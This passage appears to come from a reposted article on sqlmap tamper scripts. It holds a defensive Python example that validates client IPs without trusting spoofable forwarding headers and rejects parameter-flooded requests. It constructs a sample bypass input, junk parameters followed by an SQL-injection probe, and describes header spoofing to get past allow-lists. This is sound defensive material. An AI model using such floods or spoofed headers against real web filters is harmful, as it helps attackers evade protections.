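The two header scripts above and luanginx.py target operational weaknesses rather than parsing: trusting client-supplied addresses for allow-listing, and an inspection engine that stops after a fixed number of parameters. The following is an added example (not code from the article or from sqlmap) of the two corresponding server-side checks: resolving the client address only from the TCP peer and the trusted-proxy chain, ignoring X-originating-IP, X-remote-IP and any X-Forwarded-For entries the client can prepend, and failing closed when a request carries more parameters than will be inspected. `client_ip`, `parameter_count`, `exceeds_inspection_limit` and the constructed `FLOODED_QUERY` are names chosen here; the 100-parameter figure is the one the article quotes.

```python
import ipaddress
from typing import List, Optional
from urllib.parse import parse_qsl

# Constructed sample: 150 blank junk parameters followed by the real one, the
# shape luanginx.py produces (its junk names are random; these are not).
FLOODED_QUERY = "&".join(f"j{i}=" for i in range(150)) + "&id=1 AND 2>1"


def parameter_count(query_string: str) -> int:
    """Count every parameter, blank values included, since the junk ones are blank."""
    return len(parse_qsl(query_string, keep_blank_values=True))


def exceeds_inspection_limit(query_string: str, limit: int = 100) -> bool:
    """True when a request carries more parameters than the rule engine will
    inspect.  The safe response is to reject the request (fail closed), not to
    inspect the first `limit` parameters and pass the remainder uninspected."""
    return parameter_count(query_string) > limit


def client_ip(remote_addr: str, forwarded_for: Optional[str],
              trusted_proxies: List[str]) -> Optional[str]:
    """Resolve the client address without trusting client-supplied headers.

    Only the TCP peer (remote_addr) is authoritative.  If that peer is one of
    our own proxies, walk X-Forwarded-For from the right, skipping trusted
    proxies; the first untrusted hop is the client.  Anything further left,
    which is where a spoofed 127.0.0.1 or 192.168.x.x would sit, is ignored.
    Returns None when the hop is not an address at all ('*', '%00', '%0A'),
    so the caller can refuse rather than allow-list garbage."""
    networks = [ipaddress.ip_network(p) for p in trusted_proxies]

    def is_trusted(value: str) -> bool:
        try:
            addr = ipaddress.ip_address(value)
        except ValueError:
            return False
        return any(addr in net for net in networks)

    if not is_trusted(remote_addr):
        return remote_addr              # direct connection: the header is irrelevant
    hops = [h.strip() for h in (forwarded_for or "").split(",") if h.strip()]
    for hop in reversed(hops):
        if is_trusted(hop):
            continue
        try:
            return str(ipaddress.ip_address(hop))
        except ValueError:
            return None                 # not an address: refuse
    return remote_addr                  # header empty or only our own proxies


if __name__ == "__main__":
    print(parameter_count(FLOODED_QUERY), exceeds_inspection_limit(FLOODED_QUERY))
    print(client_ip("10.0.0.5", "127.0.0.1, 203.0.113.9, 10.0.0.5", ["10.0.0.0/8"]))
```

The trusted-proxy list is configuration, not something derived from the request; with an empty list every header is ignored and the TCP peer is the client, which is the correct default for a server that is not behind a proxy.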


Originally published on the WeChat public account 灼剑安全团队: sqlmap-tamper脚本整理

Posted by admin on 2022-10-20 13:32:58. Please keep this link when reposting (CN-SEC: thanks to the original author for their work): http://cn-sec.com/archives/1360785.html
